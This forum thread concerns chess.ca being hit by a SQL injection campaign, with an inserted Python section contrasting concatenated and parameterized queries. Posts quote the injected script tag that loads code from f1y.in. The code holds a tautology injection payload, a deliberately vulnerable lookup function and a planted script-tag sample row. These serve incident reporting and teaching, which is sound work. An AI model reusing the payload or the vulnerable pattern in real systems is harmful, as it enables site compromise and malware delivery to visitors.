
Thread: chess.ca corrupt again?

  1. #1
    Join Date
    Aug 2008
    Posts
    1,746

    chess.ca corrupt again?

    I suspect that chess.ca was corrupted again. Webpages with information about players' ratings try to execute a script
    Code:
    <script src=http://f1y.in/j.js></script>
    Who is responsible to overlook the webpage? ED?

  2. #2
    Join Date
    Aug 2008
    Posts
    1,564

    Who do you call?

    Quote Originally Posted by Egidijus Zeromskis
    I suspect that chess.ca was corrupted again. Webpages with information about players' ratings try to execute a script
    Code:
    <script src=http://f1y.in/j.js></script>
    Who is responsible to overlook the webpage? ED?
    I would send an email to the ED! If they're not aware of the problem, how can they fix it?

    I checked my rating, and I did not encounter any problems (other than it's too low LOL), but I forwarded your message to Gerry at info@chess.ca anyway to be safe.

  3. #3

    Chess.ca corrupt again?

    Hi Bob,

    This office is aware of the issue - Eric had already sent a note to Gerry on this.

  4. #4

    SQL injection

    It is the result of a SQL injection attack. Here's a little information about it:

    http://blog.trendmicro.com/massive-s...ection-ensues/
    http://isc.sans.org/diary.html?storyid=6811

    Do not click on the link that shows up (hxxp://f1y.in/j.js) as it appears to lead to something nasty (I've deliberately messed up the url replacing http with hxxp to prevent anyone from accidentally clicking on the link).

    Ideally all web form data (like where you enter your surname to get your rating) should be filtered to prevent SQL injections. Although by looking at the number of sites that have been hit by this attack, it must be doing something a bit tricky or lots of web sites are being lazy with form filtering.

  5. #5
    Join Date
    Aug 2008
    Location
    Kitchener, ON
    Posts
    2,235
    Blog Entries
    37


    Quote Originally Posted by Steve Karpik
    Although by looking at the number of sites that have been hit by this attack, it must be doing something a bit tricky or lots of web sites are being lazy with form filtering.
    This... despite most major systems having built-in code to prevent this, many people don't bother using it, and MUCH worse, quite a few web development books DON'T TELL YOU TO!

    I'm not familiar with ASP in particular but usually it's some variation of Escape("string goes here");
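
The point made in posts #4 and #5, a surname lookup built by string concatenation versus the same lookup as a parameterized query, as an added example that is not code from the thread or from chess.ca. It uses Python's sqlite3 module standing in for whatever database the real site uses; the table, the sample players and the one row carrying a planted script tag (with a placeholder URL) are all constructed here. A parameterized query makes the escaping routine mentioned in post #5 unnecessary, because the value never becomes part of the SQL text at all; the last function is a defender's check for the footprint of the injection campaigns linked in post #4, script tags sitting in a text column.

```python
import re
import sqlite3

# Constructed sample data, not chess.ca's schema. The last row imitates a
# record that an injection campaign has already tampered with; the URL is
# a placeholder, not the address from the thread.
SAMPLE_PLAYERS = [
    ("Smith", 1850),
    ("O'Brien", 2010),
    ("Zhang", 1720),
    ("Jones<script src=http://example.invalid/j.js></script>", 1600),
]

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def make_db():
    """Build an in-memory players table from the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE players (surname TEXT, rating INTEGER)")
    conn.executemany("INSERT INTO players VALUES (?, ?)", SAMPLE_PLAYERS)
    return conn


def lookup_rating_vulnerable(conn, surname):
    """The flawed pattern: the form field is pasted into the SQL text, so
    any quote in it changes the grammar of the statement."""
    sql = "SELECT surname, rating FROM players WHERE surname = '" + surname + "'"
    return conn.execute(sql).fetchall()


def lookup_rating_safe(conn, surname):
    """The fix: a placeholder in the statement, the value passed separately.
    The driver treats it as data only, so no escaping routine is needed."""
    sql = "SELECT surname, rating FROM players WHERE surname = ?"
    return conn.execute(sql, (surname,)).fetchall()


def find_injected_script_rows(conn):
    """Defender's check: rows whose text column contains an HTML script tag,
    the mark the mass-injection campaigns leave in stored data."""
    rows = conn.execute("SELECT rowid, surname FROM players").fetchall()
    return [(rowid, surname) for rowid, surname in rows if SCRIPT_TAG.search(surname)]


def demo():
    """Run both lookups on a legitimate and on a hostile input (both constructed)."""
    conn = make_db()
    results = {}

    # 1. An ordinary surname with an apostrophe breaks the concatenated query
    #    outright; the parameterized one returns the right row.
    try:
        results["vuln_obrien"] = lookup_rating_vulnerable(conn, "O'Brien")
    except sqlite3.OperationalError as exc:
        results["vuln_obrien"] = "error: " + str(exc)
    results["safe_obrien"] = lookup_rating_safe(conn, "O'Brien")

    # 2. Input that closes the quote and appends an always-true condition:
    #    the concatenated query returns every row, the parameterized query
    #    looks for that literal string as a surname and finds nothing.
    hostile = "x' OR 'a'='a"
    results["vuln_hostile"] = lookup_rating_vulnerable(conn, hostile)
    results["safe_hostile"] = lookup_rating_safe(conn, hostile)

    # 3. Inventory check for already-tampered rows.
    results["tampered_rows"] = find_injected_script_rows(conn)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The same structure applies to ASP with ADO or any other stack: keep the statement fixed and pass the form value as a parameter; escaping is a second-best substitute that only works if it is applied to every field on every page, which is exactly the lapse post #4 suspects.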

  6. #6


    damn script kiddies...
